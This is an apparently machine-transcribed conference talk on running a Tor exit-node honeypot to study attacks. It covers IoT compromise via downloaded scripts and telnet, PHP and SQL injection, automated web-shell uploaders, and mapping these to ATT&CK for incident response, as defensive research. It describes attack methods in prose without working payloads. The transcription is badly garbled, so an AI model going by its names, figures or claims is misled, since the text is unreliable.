Hunting bad guys that use Tor in real time

security

and the c9 the mainstream part of this as involving it behind the scenes but it was not really good for the first one for that and i'm really nervous

is

is

um

[Music]

third point for data exploitation investigation generally starts and stops at all the issue is that when you're going through all these fiber logs and you're seeing that the traffic for data exploitation is going to uh toward your url generally you can't go beyond that because at that point how do you find out who it really is or where is that data going on what is the activity happening behind so to understand that part better and to understand uh what really happened especially with a client for

as part of that lab i was trying to understand for a particular client who got hit by that's where or 58 actually got in because all the ivs and everything else that we were seeing were specifically coming from the top and going down it's completely taught no other connection my name was somehow identified two patients here especially between

a few things by default or by design tor doesn't lock traffic which is technically a good thing at the same time a lot of users have actually torrenting over town which is troublesome for example i got more issues from people claiming copyright infringement than i got from law enforcement generally should i be the other way around but that the other thing was inconsistent data this is not structured data that's going through it has all kinds of data so it actually took a good amount of effort to understand what is happening with regards to the data et cetera at the same time continually hammered by attacks from the core and the internet so there are other

people behind our ips who are attacking the ipod as well as normal uh connections and so on that also attacking the helicopter so and as you can see in my little graph here this is the authentication activity over a 24 hour period the greens are the failures and the view are these successes so i don't have a lot of problem jobs to get the data out because that was kimbos affected me that i could think of but there were a lot of login failures and each part here represents one hour so it's almost akin to an enterprise grade system that is taking a beating as compared to what happened in the total now as part of the node to get the data

in the somewhat structured format i set up a custom final cosplay that was based out of gastronom so i can get the data in a way that i can track the vulnerabilities that are going through especially to understand how these attacks happen like when our client got preached the idea that i was doing the attack was authority so i wanted to learn more and how exactly this works and i use sumo logic for the data analytics part because i realized it's pretty quick that without a big data solution this is too much data to just look at so a little background of the client that got hit the client's internet facing instructuralities according to client course printers they actually

have windows accessible if you went to short services with attendees they said this feature i still don't get the point they had web servers websites and dmt switches standard they had default apache pages and the corresponding default solutions including the reference which was supposed to be deleted about a decade and a half ago but they're still there firewall scale and iot devices now when we did our scan with their public ips domains and everything else out there we found more than express key and patch web servers systems running windows 2003 hdb servers without taking authentication and best linux converter servers busy box now if you're familiar with busy bulbs you'll notice that it's present in all therapy devices it's

an embedded linux web server what the attack was able to do was use the hardware credentials they got from another woman controller that was spelling silver to logic three which was quite easy to happen at that point still is at this point and they use the same credentials because they were same idea event credentials that had not been changed in a decade at that point you also have to wonder what was the client's password policy if passwords were not changed for a decade and the attacker had used a torque connection to perform the compromise and all of the malicious acts so i did a quick search on shorthand just to see if many busy books

are available as little over 2000 at this point so these are differences that definitely should be secure especially if you're using hard-coded or trillion credentials that you never really bother changing now specifically for the client what is it that we saw right i saw a lot of attacks specifically using duplicate commands to download scripts from say another compromise website or compromise server that may belong to something else which might be a regiment company or a legitimate and in our course and then running these scripts directly on the machine so this query for example will download the script then change the permission to executable and then execute the step and then so on and towards the end they

will launch a telnet session to take control of the devices so i ran a search earlier this year that the activity was really peaking in the 90-day time period for this search that was run the activity actually really went up and i've been noticing this a lot especially thanks to povet since a lot more people are actually working from home certain kinds of activities are actually increasing i'll show you more on what kind specifically so i took these same um cameras and happened

almost like last 30 days 21 unique ideas that were hosting the malicious spirits these from the popular virtual storage or virtual server providers and so on and in some cases they actually belong to legitimate companies that were compromised i guess at one point there were 53 power ips pushing the strips that means at the time that i was running the node in my case i was exit node which is how i can see under this traffic i had 53 different relay nodes who are sending me this information and of the total targets is also the exit node and i can actually see who's getting attacked so 4036 unique targets now the count that shows right

the count that shows here is for how many times i saw this specific command run so this press that swing or command run 336 times the next one right 259 times i'm not entirely sure on why certain commands are higher numbers certain load my best guess for that part is that at one point of time the attacker was having good success with one set of ips or one set of iocs and then they were of started moving to the next match so i guess the first branch to the best success rate and then slowly got worse customers went on now in this do you think it could have been prevented busybox iot was compromised as

externally accessible in the client's case this device had no reason to be externally accessed the client also did not actually go through a final review or any other thing so the too many things missing in that case the credentials that were harvested from the domain controller were reused throughout the environment like you mentioned they had some admin passwords that would not change for a decade just imagine that password policy probably has studying started changing no matter what the client would say and the bad guy used to connection to perform the compromise and all of the militias so as far as we are concerned either the top project people had us or the client or someone who's

controlling all of the tornado system what do you know in these cases it makes it very hard to identify what is the uh initial position what happens and obviously patient zero the only thing we can do is from a fiber log is to understand on what happened first to try to work our way backwards to that even with all of things identified i'm still only able to get the graphic that's going through my node and not through the entire network because there's no way my one node will have enough of a percentage or bandwidth share for across all of the nodes that it's now i try to take all of the um attacks that are coming in and use

what is called yarn rules and sigma rules to try and uh classify their categorized quarterly attacks as specifically what is happening over the last 30 days it had a good variety of attacks where about 50 were sql injection over the last year i had 97.4 percent of them being php injection so even though php injection may have slowed down in the last 30 days but overall throughout the year at least this year i i've noticed that a lot of people like to do php injection so i try to dig deeper on what exactly is it that folks are trying to do or what is going on in the background that's causing one side to be significantly higher as

compared to the other side now other activities i've seen is things like directory traversal so that could be used with tools like directory buster and so on as you're doing pen testing or trying to break in with somebody's doing it over top there's a lot of web scanning which is almost following the part of the cyberkitchen framework when you first go for recon and you go other steps step by step and that's the same thing that i've been seeing as part of traffic as well that most attractors will do recon first and then they'll do something else so to an extent this can be used to predict who's about to get attacked next providing certain amount of scanning

across certain amount of devices therefore in other things have already happened so it can be used to predict attacks and so on also useful to understand what are the different methodology that people are using like one of the things i found was edidab ejection and i've only used that when i'm doing writing assessments so if you want to ever learn how somebody else is doing lab injection either maliciously or potentially as part of a red tea this is a great way to pick up their gammas without them ever also for glutens you can use this to improve your defenses you figure out what other people are doing so as part of this i try to draw patterns from all those

things that are going in i saw remote core execution going all around i saw sql injection and through all of these i was trying to further classify things better in two different categories what i was able to convert that into was a live feed of source of all of the attacks now in this case this screenshot i had initially planned show live dashboard but i was worried about my internet dying or my audio time which already happened so let's start with so this is a live dashboard of live feed of different attacks fitted into categories so i'm taking all the attacks as i'm coming in on the left side with the live feed with different

payloads that are on it and then i'm filtering out the remote for execution the sql injections and so on and the objective here was to see if i can classify this in terms of what is a genuine thing versus what is someone playing around with the tool they found online because their house happens and many times you'll also encounter scriptpities in general who are attacking random websites and possibly those people at the same time with rca and sql ejection i've tried to identify if there's any campaign going on kind of phishing and so on you hear a lot of campaigns that there's a malware campaign targeting such as such a person with fishing my thought was

can this same theory be applied to actual attacks that are happening through thought that people are using so for that i was able to convert this into say standard templates of attacks the one that you see on the left for the php injection pack majority of these are using one tool as you can see here that particular tool i actually noticed is the most pirated tool available for web application scanning and a lot of people are running it over towards just to hide themselves but it still shows up the one in the middle is like default or template-based uh prospect stripping attacks and on the right interestingly i found a lot more for sql ejection so especially the sql

injection if you have seen the name of the table apart from things like information underscore schema which is like saying that i'm using a default table name if you don't have a table name in pieces that actually saw non-default table name or not default database name used that's a clear indication that at that point that particular database has been compromised because how else would someone external figure out what's the name of a table or a database unless they've had some access to it and so on so actually identify compromise so at this point i was thinking how else or rather what else can i do on this or how can i identify what specific tools

are being used what's wrong things that are obvious in the names so with that i found something very interesting i actually found a successful php injection attack happened using a cms specific attack so i saw a script with a payload specifically that is mentioning a specific file called its attacker dot jpeg now if you're familiar with the tool it's a data then this would make sense what it's attractive basically does is it it's an automated tool for exploitation and so on and it's mostly used by private set and so on to attach sites i've not seen anyone try legitimate use of bad testing although it might be applicable so this tool will first try to figure

out what is the cms that you have you have wordpress joomla and so on based on that is then going to run a command to check the uh say document root to try and upload shells if there's any vulnerability in any of the plugins the themes or say in this case it is uploaded and if it's outdated then it's going to try and upload a file to it so in this case it's trying to upload it of contents of a placement link so whenever you write baseband.com says raw slash whatever the file is that from them the exact data but not uh if you do it without draw it is just showing you the fine

paste and dot top side and you are accessing the same full page with html tags and so on putting it raw you get the raw data so in this case it is trying to download the file sale if it doesn't work for whatever reason a second check is going to check if it's set up to be administered php and it's going to try again after it's done this it is not going to execute the contents of the text file so in this case this uh file placement.com the same open as this text file immediately when it opens you can see the name again it is running a tool called x attacker version 1.5 it is trying to set the file

uh to have execution permission for six four four it is trying to move the uploaded file to the temp folder it's trying to change the permissions for it as well and if everything succeeds it will say success uploaded in this case or rather this particular string that we're looking at this was after the whole attack had taken place which made me realize that there might be actually more tools that are doing the whole automation of attack and a lot of people are using that combined with or to hide themselves much better and this is the tool it says it's a free website vulnerability scanner and auto exporter the essential news of the tool is either

you can define one ips or url or you give it a list of 600 urls it's going to automatically transfer directly almost like the auto port 2 that used to exist for viralbot

so based on all of this i was trying to understand how i can map this back into something that makes more sense so i've decided to go with the mixer attack framework based on all of the attacks that i've seen so far as part of this research and so on for initial access the most common i've seen is the expectation of complete facing application that may be the iot devices that may be the web servers and so on for execution i have seen scripting and service execution especially with the remote command execution for persistence i've seen access to the external remote services for discovery there's plenty of web scan regardless on the that's the network

service scanning the device discovery or system discovery for community control especially for things like a quartet tripod quad board q port and a few others if you have ever looked at the traffic you will see that all of them outbound traffic or details is actually going to talk and through all of my assistance actually pick those up just able to format them into much better looking systems as well so through the same thing we also have russian proxy and sometimes a custom command control protocol and all around for the automatic exploitation if this say a prawn job running that will push files out to a system hosted within thor or on the inside you'll see that

and then again expression over chc now i took all of this because this into an automated dashboard in this case not showing live just scripture then i was able to contribute the threads based on the yama rules and sigma rules for them to qualify all of the traffic

to stealer the name of the manual was polyphenols it was part of the department figure um it's not the primitive pair is the most likely one and these are indicators based on the ttps identified up against

database there is a list of all of the groups and their tdps and all the things they do and so on so all the information against including things like a malware was used for many directions and so on all the things that will happen especially with that system with that activity when whatever traffic speaker automated against evil apart framework

and some of this especially when it says just c2 in those cases there's also coalition against whatever three courses and increases and just

the initial analysis once people break in as the first part the execution would be remote code execution and so on and then come out and control so discovery in about a 90-day period was about 359 000 plus events execution slightly more at three and sixty thousand plus events initially it says 2.5 million per seconds so based on the traffic i analyzed what came out of me was there's a few websites against going through i'm really seeing partial things come my way but when it says asian emphasis is 2.5 million that's the initial attack that happened on these systems and then the common control

and it's slowly coming back kind of thing i initially thought this might be related to microsoft when they say that they took down imported in a few other importance and said that news came out around october 19th or 20th can you see anything else although there's a challenge they were actually working on taking it out and that's why we were all the graphic problem but even through this we could still track more cnc systems as they're going through now you may be wondering out of all of this how much is automated activity and how much is say someone actually kind of taken so of all the activity of the attacks in the last month identified about 85.80 to be automated

tools it could be like the one we saw earlier for example it could be someone using any of the other third party tools that are meant for automated scanning it could be someone using even arbitrage for that matter where you can just click on a hail media let it dry on its own on all the different backs you need to do the differentiation i made for the actual exploit so things like say a remote code execution that was run specifically for an ip and only run a few times just enough to break in and then stop or something that didn't match any standard signatures now overall in this what was the say different kind of attacks on

non-attack traffic i saw a lot of in the last 20 days it was mostly traffic and velocity also mostly attacked but over the last three years which is almost the length of which i've been running this it's about 50 50. so the point here is in a direct traffic this would be attached to systems this would be say data exploration or infiltration this would be specific that's on say web scanning and all those things the known attack is regular traffic that was either encrypted or something that could not be disrupted deciphered or something that was so unstructured that i couldn't be sensible so it just went in the non-attack category it is interesting though that

all the attacks that i picked up were actually not encrypted all of the attack commands as they were leaving the exit node none of them were interpreted which is how i was able to get regular details on every single command and system that is running your citizen so you're wondering at this point how does it relate back to the ir i was on with having all of this specific information and understanding exactly how is it that attacks are coming in what is the exact attack title mistakes that are followed i was able to collect all of the different kind of attacks based on the applications in use by the clients for the iot devices for the

printers which made them get off the network and other devices that were exposed i was literally able to identify what was the correct attack time frame the attack time frame that you're looking at was from the time these first employment and then working on great networks these first attackers actually took in the environment was also from power kind of attacks that from our ips including a transit may not be coming from the communities and seeing the matching between them to understand better on how to protect that line and the last system from that activity was actually quite useful and protecting the truth of the matter is there is so much evidence and iocs that are

available from tor if you know where to go and by building a honeypot i was able to look better on how to proactively protect climates

you can use that to learn how to see attract happening what's specifically the attack doing and how you can better protect your clients in general also tour is technically not in that end anymore the benefit of running a honeypot tour is as opposed to honeypot on your own if you just run a tripod to yourself you're only seeing attacks that are coming to you if you're running a harry potter tour you're not only seeing the attacks coming on you and that's quarter or so you're also seeing the attackers going on sometimes so it's almost like you're learning from somebody else's lesson somewhat comfortable for security

like i mentioned for this you can actually see where the attackers are coming from in terms of what tools and what uh metrologies and gtps they're using not specifically the locations but you can see what they're doing say for web scan first and then what they do next and based on that you can predict when somebody is about to get a record potential or you see a lot of that scanning happening center ids to a particular ip or say two way that belongs to a client or even to your own network because you're seeing a lot of breath scanning activity center varieties guaranteed somebody's approaching around you know existing

so if you look through all of this the possibility that exists for the announcement of hunting activities could be acquiring more technical information or just in general being better prepared for items because now you know how to block things better that definitely works so that's it for my presentation any question matt what do you mean by protecting yourself by using power

as part of this activities i've actually seen other people using thor to expert other people who are currently using or and get out of their browsers generally not using talk from home is best so my recommendation is browse dog you can rent out like a bps and run call from there so in case something is compromised you'll stand bps and you can just delete it and move on so some people like to use pales from home as a vm they also forget that the entry node at that point can still find their ipads because ian's using tails technically your home might be still getting